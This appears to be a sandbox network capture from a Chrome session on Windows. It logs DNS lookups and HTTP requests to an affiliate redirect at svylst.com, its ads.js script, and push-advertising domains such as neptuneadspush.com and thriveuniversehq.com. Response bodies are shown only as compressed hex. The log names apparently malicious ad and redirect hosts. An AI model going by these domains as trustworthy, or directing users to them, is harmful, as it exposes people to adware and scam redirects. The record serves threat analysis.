                                                          Nov 27, 2023 04:23:41.824938059 CET1.1.1.1192.168.2.50x1602No error (0)www.google.com142.251.167.103A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.825299978 CET1.1.1.1192.168.2.50xefdeNo error (0)www.google.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.382123947 CET1.1.1.1192.168.2.50xe0c5No error (0)www.google.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.382831097 CET1.1.1.1192.168.2.50xb533No error (0)www.google.com142.251.163.105A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.382831097 CET1.1.1.1192.168.2.50xb533No error (0)www.google.com142.251.163.103A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.382831097 CET1.1.1.1192.168.2.50xb533No error (0)www.google.com142.251.163.99A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.382831097 CET1.1.1.1192.168.2.50xb533No error (0)www.google.com142.251.163.106A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.382831097 CET1.1.1.1192.168.2.50xb533No error (0)www.google.com142.251.163.147A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.382831097 CET1.1.1.1192.168.2.50xb533No error (0)www.google.com142.251.163.104A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.903717995 CET1.1.1.1192.168.2.50x6eb8No error (0)svylst.com104.21.78.140A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.903717995 CET1.1.1.1192.168.2.50x6eb8No error (0)svylst.com172.67.222.109A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.962994099 CET1.1.1.1192.168.2.50x6ebcNo error (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:44.151392937 CET1.1.1.1192.168.2.50x6c9No error (0)www.google.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:44.151411057 CET1.1.1.1192.168.2.50x19cdNo error (0)www.google.com172.253.62.106A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:44.151411057 CET1.1.1.1192.168.2.50x19cdNo error (0)www.google.com172.253.62.105A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:44.151411057 CET1.1.1.1192.168.2.50x19cdNo error (0)www.google.com172.253.62.99A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:44.151411057 CET1.1.1.1192.168.2.50x19cdNo error (0)www.google.com172.253.62.104A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:44.151411057 CET1.1.1.1192.168.2.50x19cdNo error (0)www.google.com172.253.62.147A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:44.151411057 CET1.1.1.1192.168.2.50x19cdNo error (0)www.google.com172.253.62.103A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.431442022 CET1.1.1.1192.168.2.50x3b8dNo error (0)svylst.com104.21.78.140A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.431442022 CET1.1.1.1192.168.2.50x3b8dNo error (0)svylst.com172.67.222.109A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.434801102 CET1.1.1.1192.168.2.50x8db8No error (0)svylst.com104.21.78.140A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.434801102 CET1.1.1.1192.168.2.50x8db8No error (0)svylst.com172.67.222.109A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.435677052 CET1.1.1.1192.168.2.50x7ba6No error (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.455770969 CET1.1.1.1192.168.2.50x3d35No error (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.479222059 CET1.1.1.1192.168.2.50xde43No error (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.560125113 CET1.1.1.1192.168.2.50x4d0dNo error (0)svylst.com172.67.222.109A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.560125113 CET1.1.1.1192.168.2.50x4d0dNo error (0)svylst.com104.21.78.140A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.723148108 CET1.1.1.1192.168.2.50x8162No error (0)svylst.com104.21.78.140A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.723148108 CET1.1.1.1192.168.2.50x8162No error (0)svylst.com172.67.222.109A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.724821091 CET1.1.1.1192.168.2.50x3fcfNo error (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:47.108946085 CET1.1.1.1192.168.2.50xe264No error (0)sofa.thriveuniversehq.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:47.110044003 CET1.1.1.1192.168.2.50x9858No error (0)sofa.thriveuniversehq.com104.21.1.7A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:47.110044003 CET1.1.1.1192.168.2.50x9858No error (0)sofa.thriveuniversehq.com172.67.151.183A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:49.861304998 CET1.1.1.1192.168.2.50xde24No error (0)sofa.thriveuniversehq.com172.67.151.183A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:49.861304998 CET1.1.1.1192.168.2.50xde24No error (0)sofa.thriveuniversehq.com104.21.1.7A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:49.862173080 CET1.1.1.1192.168.2.50x417dNo error (0)sofa.thriveuniversehq.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:51.219249964 CET1.1.1.1192.168.2.50xfa91No error (0)pushrev.neptuneadspush.com172.64.100.6A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:51.219249964 CET1.1.1.1192.168.2.50xfa91No error (0)pushrev.neptuneadspush.com172.64.101.6A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:51.220175028 CET1.1.1.1192.168.2.50xcd81No error (0)pushrev.neptuneadspush.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:52.935066938 CET1.1.1.1192.168.2.50x3d42No error (0)stun.l.google.com142.250.112.127A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:52.935729980 CET1.1.1.1192.168.2.50xae26No error (0)stun.l.google.com28IN (0x0001)false
                                                          Nov 27, 2023 04:23:53.067167997 CET1.1.1.1192.168.2.50xa67dNo error (0)stun.l.google.com28IN (0x0001)false
                                                          Nov 27, 2023 04:23:53.636158943 CET1.1.1.1192.168.2.50xa8f2No error (0)pushlite.neptuneadspush.com172.64.100.6A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:53.636158943 CET1.1.1.1192.168.2.50xa8f2No error (0)pushlite.neptuneadspush.com172.64.101.6A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:53.642005920 CET1.1.1.1192.168.2.50x6c2eNo error (0)pushlite.neptuneadspush.com65IN (0x0001)false
                                                          Nov 27, 2023 04:24:01.694446087 CET1.1.1.1192.168.2.50x802cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.724175930 CET1.1.1.1192.168.2.50x720No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.724175930 CET1.1.1.1192.168.2.50x720No error (0)clients.l.google.com172.253.122.102A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.724175930 CET1.1.1.1192.168.2.50x720No error (0)clients.l.google.com172.253.122.139A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.724175930 CET1.1.1.1192.168.2.50x720No error (0)clients.l.google.com172.253.122.113A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.724175930 CET1.1.1.1192.168.2.50x720No error (0)clients.l.google.com172.253.122.138A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.724175930 CET1.1.1.1192.168.2.50x720No error (0)clients.l.google.com172.253.122.100A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.724175930 CET1.1.1.1192.168.2.50x720No error (0)clients.l.google.com172.253.122.101A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.724987984 CET1.1.1.1192.168.2.50xdccNo error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                          • clients2.google.com
                                                          • accounts.google.com
                                                          • https:
                                                            • www.google.com
                                                            • www.govwlfeloony.com
                                                            • sofa.thriveuniversehq.com
                                                            • pushrev.neptuneadspush.com
                                                            • pushlite.neptuneadspush.com
                                                            • www.bing.com
                                                          • svylst.com
                                                          • fs.microsoft.com
                                                          • slscr.update.microsoft.com
                                                          • a.nel.cloudflare.com
                                                          • clients1.google.com
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549717104.21.78.140804324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 27, 2023 04:23:43.062812090 CET596OUTGET /aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4= HTTP/1.1
                                                          Host: svylst.com
                                                          Connection: keep-alive
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.9
                                                          Nov 27, 2023 04:23:43.608185053 CET1340INHTTP/1.1 200 OK
                                                          Date: Mon, 27 Nov 2023 03:23:43 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Set-Cookie: C=848bd2316dc3abc1c9b4aad2b173f936
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Khgq%2F4SnZlmkgEnW5gbjwlfakrRA1f7T7iftpmCZQGJ3PMBysyi6IlQv2yp%2FQyYC9zkKvEm5Ct%2FE%2Flx9GitlXXx5jYuTmJ5DYcA%2BuqrSDKlyPj7KpbQQjdQZutFD"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 82c7410a6b9272ec-IAD
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 36 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 58 5b 93 d3 36 14 7e 86 5f 01 3c ac 2c 62 58 5d 2c 4b c6 eb 9d d9 42 69 a1 b4 53 ba a5 b7 8c 87 91 6d 99 84 66 93 60 3b bb 81 6d fe 7b 47 92 2d c7 ac b3 30 d3 be 38 96 ce 55 e7 7c 3a e7 c4 77 ef 9c cc 9a 8b c5 e9 dd 3b 27 33 25 0b fd 5b e7 d5 7c dd dc ab ab 3c 79 70 fc be 3e 96 45 fd f8 7d fd e0 f4 e4 d8 52 7a 9e d3 bb 77 ca cd 32 6f e6 ab e5 bd b7 68 1b 84 38 f3 de a2 2d 55 38 67 c2 d7 3b 34 0a 05 87 d7 97 b2 d2 0c 12 13 52 ca a4 7d f3 60 5c a9 66 53 39 d9 a4 53 e6 b5 1b 92 68 25 18 85 11 2d e1 b5 db 4c dc db 23 b4 e5 2a 6e b5 53 9c 2b 5e 26 ce ce d4 b1 a5 7b 86 2c 57 bc f3 6f 73 38 de b5 3a 19 43 0a 85 9d c1 78 ff b4 f6 08 dd d1 32 5c 64 4c 25 53 10 c8 cb e6 f7 ec 25 f0 c1 4c d6 b3 a7 ab 8b f5 6a a9 96 4d 0d 7c 80 05 7a ba 99 bd 5c fe 04 7c b0 59 16 aa 9c 2f 55 01 7c d0 cc d4 52 f3 37 cd fa c9 f1 b1 de a8 e6 17 c0 07 f9 be 30 0d 22 82 58 55 bf fe e6 cd 33 cd b2 da e4 b3 f3 cd 7a bd aa 1a e0 83 42 5d ce 73 f5 a3 ba 58 55 1f b5 25 fc e9 f7 ef 5e 9d 9f 69 ad 95 2a 81 0f ca 6a 75 f1 74 26 ab a7 ab 42 01 1f 5c ca c5 46 ff 56 6a bd 90 b9 7e bb 90 db 5f b5 ce 9f 57 f3 d6 5b 72 f5 ee 43 2d 9f 03 1f bc 53 da 46 2e 9b 7c 06 7c c0 78 a0 fe 3c fb 20 57 c0 07 d7 ea 62 dd 7c dc 01 1f 04 18 a3 e0 c7 37 9f fe 78 af 79 08 8d b8 e0 f4 c3 f9 b3 37 cf fe 02 3e 58 ac 72 a9 03 a7 0f 42 69 20 02 82 d4 ab ef cb f7 5a c7 42 2d df 35 b3 36 00 b5 8d 00 c5 9c a2 20 38 ff e1 97 b3 17 bf 68 67 e8 1f f5 fa ec fc 03 f0 81 0e 03 e5 e8 75 f9 42 be d4 aa 49 c8 a2 df ae 9e 6f de e8 90 99 d3 5c a8 65 03 d2 b8 cd 51 8f 2a 78 dd c3 c0 e6 2b de ed 21 a3 c5 e4 ce db 87 21 61 54 b0 dc c0 30 63 b2 60 2e e1 2c 64 a1 a2 89 41 65 9e 45 51 f9 04 6d a3 c2 30 16 39 15 e1 13 b4 15 5c 2f 59 20 8a 30 d3 cb c8 20 8c 89 2c 10 9a d9 52 15 e6 98 69 6a 60 21 49 b1 0a 82 0e 70 66 47 4a 24 78 e2 7c f1 60 7c 35 9b 2f 94 77 ff fe 34 85 d7 4d f5 b1 73 29 50 a5 a4 3c 79 b4 96 55 ad 5e 2c 1b cf e9 f3 d0 56 48 08 8f d1 16 3f f4 c6 e9 bc 34 74 02 27
                                                          Data Ascii: 6baX[6~_<,bX],KBiSmf`;m{G-08U|:w;'3%[|<yp>E}Rzw2oh8-U8g;4R}`\fS9Sh%-L#*nS+^&{,Wos8:Cx2\dL%S%LjM|z\|Y/U|R70"XU3zB]sXU%^i*jut&B\FVj~_W[rC-SF.||x< Wb|7xy7>XrBi ZB-56 8hguBIo\eQ*x+!!aT0c`.,dAeEQm09\/Y 0 ,Rij`!IpfGJ$x|`|5/w4Ms)P<yU^,VH?4t'
                                                          Nov 27, 2023 04:23:43.608217001 CET1127INData Raw: e3 e2 c4 90 e9 43 6f 9c 9c 1b 72 70 40 3a 0a 0c 99 4d c6 6c bb 60 3e 76 b1 34 dc e1 b8 ab 03 76 1b 6b c3 ce 0f 79 8e 0d 59 1c 3a b8 50 86 1e 8d 8a 0f 8c d9 4c 1a 6e 39 1a 87 e1 49 4c a2 0d 77 06 bf 7c 70 0b 04 c3 9e 1f 0a b2 d5 56 c0 78 5e 7a 7d
                                                          Data Ascii: Corp@:Ml`>v4vkyY:PLn9ILw|pVx^z}GgV)w3M=SeRxg)`BUmE(0Yda-g#fG5D:1TYYP9ZRq<}y(Tx4O&y_
                                                          Nov 27, 2023 04:23:43.608232975 CET59INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0
                                                          Nov 27, 2023 04:23:44.068578005 CET516OUTGET /js/ads.js HTTP/1.1
                                                          Host: svylst.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Referer: http://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: C=848bd2316dc3abc1c9b4aad2b173f936
                                                          Nov 27, 2023 04:23:44.202110052 CET1340INHTTP/1.1 200 OK
                                                          Date: Mon, 27 Nov 2023 03:23:44 GMT
                                                          Content-Type: text/javascript; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Last-Modified: Thu, 05 May 2022 12:29:39 GMT
                                                          Cache-Control: max-age=14400
                                                          CF-Cache-Status: HIT
                                                          Age: 7030
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B%2F%2BSVDsanfHfRy1VsvK5DjDZ%2BgAdCNzi%2BUYjjAWYznocGFflx2xh1fDtqtaCwy5cuTfWPdhj9MAW5xVtmo23RrqTnG%2BO4%2FrlrkMQ2xV7lKfXtGgfdDZZTxPZ7biN"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          Server: cloudflare
                                                          CF-RAY: 82c74110a98272ec-IAD
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 33 31 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 7d dd 76 db 38 d2 e0 ab c8 4c 7f 6e 32 82 68 52 92 1d 87 0a e3 e3 38 3f ed 9e 38 71 c7 49 f7 cc 28 6c 0f 44 42 12 da 24 c0 06 40 d9 8a ad 7d 85 bd df 8b dd b3 d7 fb 02 fb 3c fb 02 bb 8f b0 a7 00 fe 49 96 dd dd b3 37 3b d3 27 26 80 02 50 28 14 0a 85 42 a1 b4 c0 a2 73 fc fa 22 9c 16 2c 56 94 33 9b 38 b7 56 21 49 47 2a 41 63 65 8d 16 58 74 54 53 ec dc 0a a2 0a c1 3a 2a fc 38 f9 8d c4 ca c5 52 d2 19 bb bb 6b b7 30 e5 c2 d6 15 11 0b 7d 24 42 2c 66 45 46 98 92 6e 4a d8 4c cd 47 ec 85 18 b1 6e d7 a9 00 71 87 42 93 35 dc 98 45 4e d9 7e 2e b8 e2 6a 99 13 77 8e e5 c7 6b 76 2e 78 4e 84 5a ba 31 4e 53 5b 21 ec ec ee da 64 8c a3 50 8d 71 e4 8c 4a fc c8 0a 29 17 e7 79 ba b4 d5 9c 4a 54 37 ed ac 46 15 aa 1d 66 13 a4 10 43 a2 1e 16 23 d7 36 bb bb b3 59 78 2e 78 46 25 71 1c db ae 87 86 11 77 6e eb da 14 86 aa c4 f2 b6 b0 85 cb c8 8d b2 89 e3 ac 62 ac e2 b9 ad 9c 5b 6e 2b 67 b5 aa a1 e3 36 b4 9a 0b 7e fd 28 78 01 e0 9a 86 23 e2 26 9c 91 23 6c 13 77 81 d3 82 38 81 ad c2 f2 1b a9 0e 65 52 61 16 13 3e ed b0 23 15 30 72 dd 61 2d 9c 89 73 4b a0 69 c7 71 5c 35 27 cc a6 28 76 56 85 6d 8b 50 94 04 22 48 dd dd 8d 23 c7 31 a3 70 00 b8 c1 44 40 b9 c1 85 21 81 30 e2 88 86 b7 29 9e 90 34 f0 90 24 4c 05 2d f6 a0 53 db df c5 63 2f 72 f4 18 3b 78 ec 47 d5 9c c0 f7 0a 29 b1 94 c1 38 42 3c 87 3f ab aa 90 87 b7 d0 7b 10 db 9e 83 74 dd 20 b6 7d 07 99 e2 20 b6 fb ce 0a 59 55 4f 56 18 02 4f f0 69 e7 62 99 4d 78 ba bb 6b f3 b1 f9 74 a9 22 02 2b 2e a2 6d 6c 3b a7 72 e5 20 3e 6a cd 0b af 4b 6b f8 f8 7e 16 d7 63 63 e5 b0 80 ca 9f 97 39 79 23 04 17 b6 f5 8e 30 d3 67 87 ca 0e 4e 05 c1 c9 b2 43 6e 48 5c 28 ca 66 ae e5 8c 80 d3 47 74 e4 00 07 40 3b b0 2e 76 77 6d 1c f6 77 f9 d8 8b 8e 84
                                                          Data Ascii: 31a3}v8Ln2hR8?8qI(lDB$@}<I7;'&P(Bs",V38V!IG*AceXtTS:*8Rk0}$B,fEFnJLGnqB5EN~.jwkv.xNZ1NS[!dPqJ)yJT7FfC#6Yx.xF%qwnb[n+g6~(x#&#lw8eRa>#0ra-sKiq\5'(vVmP"H#1pD@!0)4$L-Sc/r;xG)8B<?{t } YUOVOibMxkt"+.ml;r >jKk~cc9y#0gNCnH\(fGt@;.vwmw
                                                          Nov 27, 2023 04:23:44.202125072 CET1340INData Raw: 5b 0e b4 4c e9 6e ee ee 6c 1b 87 55 91 b3 bb 8b 0d d7 0b 07 79 4e 60 98 ce d9 dd dd b1 71 58 95 20 3e f6 61 26 81 65 9c 8a ee 23 79 4d 81 cd 44 e8 21 0c a4 0a c7 a6 5b 84 0d 1b 45 0e 82 a4 73 1b 63 49 3a 5e a0 ff f8 01 0e f9 68 22 08 be 1a e9 8c
                                                          Data Ascii: [LnlUyN`qX >a&e#yMD![EscI:^h"aP6H]=.A2A%Bbe1`Ryn;&&dTtj`6UGNvw]=+ {/N<Zf(z"P[o!jB#Ts
                                                          Nov 27, 2023 04:23:44.202137947 CET1340INData Raw: fa 4e 84 fa c3 1a d6 7f 0c d6 73 22 e4 1f d4 b0 de 23 b0 cf 9d 08 d5 23 7b 1e 68 aa 6a e0 fb a0 87 4e e4 c0 5c b4 e8 0f 53 a4 e7 26 af 9a 38 0c e2 70 6a c7 5b fb 7a e6 44 68 bf 46 eb d9 23 90 07 6b 04 3f 78 04 72 7f 8d dc fb 8f 40 0e d7 88 3d 7c
                                                          Data Ascii: Ns"##{hjN\S&8pj[zDhF#k?xr@=|rF#5Bt4=Pr^44g#EtF0G+IDMe67[_(Aq21{Nw+Nf;[k$p@6xd-Vd"c`H6i
                                                          Nov 27, 2023 04:23:44.202179909 CET1340INData Raw: b2 df 4f 45 5a 81 9f 60 b6 c0 f2 04 e7 40 af 0d 96 63 1b b3 73 59 cf 4e 35 80 fa ae de 6d b0 29 07 75 77 47 dc 4c be dd 9a cd bf 41 fe c5 66 be e1 ef 2d 55 80 84 0d 1a 9f 6b 34 2e 40 ec 87 e7 a0 78 80 fe b4 bb bb 53 eb 99 7e a9 56 df 9f 40 ce b8
                                                          Data Ascii: OEZ`@csYN5m)uwGLAf-Uk4.@xS~V@)orEcA_29HaN=*"]3\3[7:z&\3*:E1*F~?}#ja'#}c_|oorZ !scA"8zn`ZC|
                                                          Nov 27, 2023 04:23:44.202193975 CET1340INData Raw: e7 22 27 31 c5 a9 5a 9a 82 2f a7 4d 9f 67 9f 3b 6f 6e 94 c0 f0 f9 8f 4f a7 c7 af cb 39 3e c3 22 25 4a e9 ae a8 58 f2 ce 97 53 f8 a6 b1 e0 92 4f 55 e7 0b 9d cd 0b a1 b3 98 3e dd 08 8d 02 67 da 21 b7 73 c2 85 a4 0b 68 f5 fc 8c b2 d9 7b fa 05 3e 05
                                                          Data Ascii: "'1Z/Mg;onO9>"%JXSOU>g!sh{>28tz1|'rwf?i-.cx7T%_]!;'o:8ye4_>!o|a."y*svKc5>`xXc^Dbx
                                                          Nov 27, 2023 04:23:44.202208042 CET1340INData Raw: 9b a9 76 95 fa b6 ef c6 ac 35 c5 90 bb c4 13 be a0 79 df eb 3f d3 53 6b f0 54 d9 00 a7 69 7f 3e d4 2c 1c c7 fb fd 67 87 97 a6 af 4b 9c 34 fd bc 05 45 75 0e 9c f7 8d 33 92 17 13 60 67 3d f4 a7 a1 75 89 93 f7 04 27 44 4c 38 16 89 61 67 9a fc 1a 1a
                                                          Data Ascii: v5y?SkTi>,gK4Eu3`g=u'DL8agX*zg`o/W8-ks8]^X#""5.'>joB%3`^__J7!{*K$ TQ4O4{S]FGc3[+\rY0SP7MJ^ze0IU:g
                                                          Nov 27, 2023 04:23:44.202223063 CET1340INData Raw: ef f0 42 74 26 29 9f ad 61 a4 e8 5b 0c 32 86 c3 fa 75 0b 45 53 90 14 bd 8c 27 45 4a 7a 53 2a c8 34 5d f6 f4 fd ab 5e 0a a6 de 1b 36 87 71 98 ed 92 08 18 8f cb 73 c2 f4 55 d4 59 25 40 a8 94 05 c9 7a 29 c1 57 cb 5e 8e 97 d7 38 4d ab 81 c9 de 37 22
                                                          Data Ascii: Bt&)a[2uES'EJzS*4]^6qsUY%@z)W^8M7"xO8Q61/ALK}.zs+<)H4T^:z4g'Z-/GQ?3,)U`\I-uMhr fp-&Rb#^N!;`-f_CRAk=Pb,)+
                                                          Nov 27, 2023 04:23:44.202234983 CET1340INData Raw: ed 3a 48 ae b9 10 16 0e c2 1b 3e 85 88 8e d3 28 2c 46 7f de 47 74 df fb 93 4e a2 5b 7c 18 b1 33 82 58 2d 40 96 2d 43 02 54 5c 3e 9d 82 ab 8d 76 96 bb bb b3 e3 31 0c 32 0a 77 e0 11 5f 15 4d a7 f6 6d c4 0f 78 d5 a9 bb 3b b5 e6 55 87 ab 8b de 71 1f
                                                          Data Ascii: :H>(,FGtN[|3X-@-CT\>v12w_Mmx;Uq}1_pmuAHm[6ebr!s,`D6m6\?B.gEjEJ`kyw2nCM%K38soiO!\#B3"m7V#Y8zN*a
                                                          Nov 27, 2023 04:23:44.202249050 CET1340INData Raw: fd 5a bd 57 bd 8c 84 23 a2 b2 7d b4 4f 06 68 38 f4 3d cf d1 3a 9f 99 b2 8f 32 a6 69 0a 96 55 ad 6c 94 57 ff 60 53 86 4b 41 50 b6 04 f9 bd 80 f7 05 26 fc 6c e8 93 e1 86 46 f8 da 28 e5 12 9c 7d 05 91 52 37 85 21 2c 2e 91 60 30 2a 2b f6 f6 3d 84 dd
                                                          Data Ascii: ZW#}Oh8=:2iUlW`SKAP&lF(}R7!,.`0*+=+Fx+jR8*s4IU%HiG\\'tWc2dX(^y<3Uv|$CONzS%Zu1$yU~0iwr#2lc&MF-PVM-ITt
                                                          Nov 27, 2023 04:23:44.277457952 CET579OUTGET /favicon.ico HTTP/1.1
                                                          Host: svylst.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Referer: http://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: C=848bd2316dc3abc1c9b4aad2b173f936
                                                          Nov 27, 2023 04:23:44.409430027 CET785INHTTP/1.1 200 OK
                                                          Date: Mon, 27 Nov 2023 03:23:44 GMT
                                                          Content-Type: text/plain; charset=utf-8; SameSite=None; Secure
                                                          Content-Length: 0
                                                          Connection: keep-alive
                                                          Nrid: 149463646
                                                          Cache-Control: max-age=14400
                                                          CF-Cache-Status: HIT
                                                          Age: 7030
                                                          Last-Modified: Mon, 27 Nov 2023 01:26:34 GMT
                                                          Accept-Ranges: bytes
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WcA79%2FUwRmkR0g3BCMlg0XfFGDKmnoCDm7ExBPEXEeu%2FSl4qCGAo7TdzLbnTKis732ouz2OH7zV8o6Nzbu6AZAQ1pTIS%2BUYpgKk2XzW3XJayqmpHZQi%2BYQtJ7tX0"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          Server: cloudflare
                                                          CF-RAY: 82c74111fce072ec-IAD
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549705142.251.179.1004434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:40 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                          Host: clients2.google.com
                                                          Connection: keep-alive
                                                          X-Goog-Update-Interactivity: fg
                                                          X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                          X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: empty
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
